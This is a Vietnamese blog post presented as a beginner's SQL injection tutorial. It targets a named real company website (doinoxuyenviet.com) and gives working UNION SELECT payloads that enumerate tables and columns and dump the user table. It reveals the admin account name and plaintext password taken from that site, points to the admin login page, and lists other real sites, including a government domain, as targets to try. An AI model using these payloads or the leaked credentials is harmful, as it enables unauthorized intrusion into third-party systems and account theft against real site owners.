Top Ad unit 728 × 90

Lastet News

random
Home Hacking SQLi cơ bản 03-01-2014

SQLi cơ bản 03-01-2014


TUT hack web với lỗi SQL injection cơ bản.
1. Công cụ
  - Add-on hackbar trên FireFox, tải tại đây
  - Web admin Finder 2.0 tải tại đây
2.
     Link victim: http://doinoxuyenviet.com/noi_dung_tin.php?MSP=1#
 3. Tiến hành

- Tiến hành kiểm tra lỗi ta thêm dấu " ' " vào sau số 1.
   tức là  http://doinoxuyenviet.com/noi_dung_tin.php?MSP=1'#
Site đã bị lỗi

Để bật/tắt Hackbar ta ấn F9.

Tiếp theo dùng lệnh order by để xác định cột bị lỗi
   lệnh( ghi trong khung của hackbar nhé)
               http://doinoxuyenviet.com/noi_dung_tin.php?MSP=1# order by 1-- ( k bị lỗi)


Tiếp tục http://doinoxuyenviet.com/noi_dung_tin.php?MSP=1# order by 2-- ( k bị lỗi)
              http://doinoxuyenviet.com/noi_dung_tin.php?MSP=1# order by 10-- ( bị lỗi rồi, ta giảm số cột lại)
              http://doinoxuyenviet.com/noi_dung_tin.php?MSP=1# order by 5-- ( k bị lỗi)
               http://doinoxuyenviet.com/noi_dung_tin.php?MSP=1# order by 6-- ( bị lỗi)

Vậy số cột là 5. Tiếp theo ta dùng lệnh UNION SELECT để tìm cột bị lỗi
 lệnh http://doinoxuyenviet.com/noi_dung_tin.php?MSP=-1 UNION SELECT 1,2,3,4,5-- -
( nhớ thêm dấu - trước số 1).

Vậy cột bị lỗi ở đây là cột số 4.
Khai thác tiếp với lệnh http://doinoxuyenviet.com/noi_dung_tin.php?MSP=-1 UNION SELECT 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables-- -
Ta được các bảng của trang web này;

copy các bảng này về notepad, ta thấy có 1 bảng có tên là nguoi_dung ( nghĩ ngay đến bảng này để lưu tài khoản)
Tiếp theo dùng lệnh để lấy các cột trong bảng nguoi_dung
lệnh http://doinoxuyenviet.com/noi_dung_tin.php?MSP=-1 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5 from information_schema.columns where table_name=0x6e67756f695f64756e67-- -
6e67756f695f64756e67 chính là mã hex của nguoi_dung
ta thu được các cột trong bảng ma_nd,ma_loai_nd,ho_ten,mat_khau

ở đây ta cẩn lấy dữ liệu từ 2 cột ho_ten  mat_khau.
Ta gõ
http://doinoxuyenviet.com/noi_dung_tin.php?MSP=-1 UNION SELECT 1,2,3,unhex(hex(group_concat(ho_ten,0x7c,mat_khau))),5 from nguoi_dung--
7c là mã hóa hex của kí tự |  thêm vào cho dễ nhìn thôi.
Ta được
Vậy họ tên = anhhungxuyenviet
mật khẩu = 12345698

Bước cuối cùng đó là tìm link admin. Ta sử dụng công cụ Web admin Finder đã nêu ở trên
Vậy link admin tìm được đó là http://doinoxuyenviet.com/admin/
oke
1 số trang check


Cect.gov.vn

Pvpe.vn

Doinoxuyenviet.com 
gianhangdienmay.com( dùng tamp data để login vào admin)
SQLi cơ bản 03-01-2014 Reviewed by Unknown on 00:29 Rating: 5

Tags :

About Huy Hùng (hungdh0x5e)

Number of Entries : 35

Đang là sinh viên năm 4 của KMA. Lĩnh vực hiện đang tìm hiểu: Android, Linux, Crypto

Không có nhận xét nào:

body{ margin-top:50px;} .menuBar{ width:100%; height:50px; display:block; position:absolute; top:0; left:0; } .logo{ float:left; } .nav{ float:right; margin-right:10px;} .nav ul li{ list-style:none; float:left; }

Đăng ký: Đăng Nhận xét (Atom)
All Rights Reserved by Huy Hùng - KMA © 2014 - 2015
Designed by JOJOThemes

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.